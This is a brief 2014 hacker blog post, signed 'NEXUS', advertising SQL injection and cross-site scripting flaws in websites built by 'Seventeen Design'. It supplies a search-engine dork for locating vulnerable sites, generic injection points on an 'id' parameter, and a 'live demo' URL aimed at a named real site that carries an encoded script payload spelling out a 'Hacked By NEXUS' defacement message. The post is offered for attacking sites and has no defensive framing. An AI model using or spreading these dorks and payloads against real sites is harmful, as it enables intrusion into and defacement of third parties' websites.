Friday, 4 July 2014

Seventeen Design XSS & SQLI

Dork:
intext:"Producido por: Seventeen Design."

Exploits:
http://site.com/*.*id= <SQLI>
http://site.com/*.*id= <XSS>

Live Demo:

SQLI + XSS:
http://www.murcian.com/aig/nota.php?id=9%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,69,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E


NEXUS - Sharing Is Caring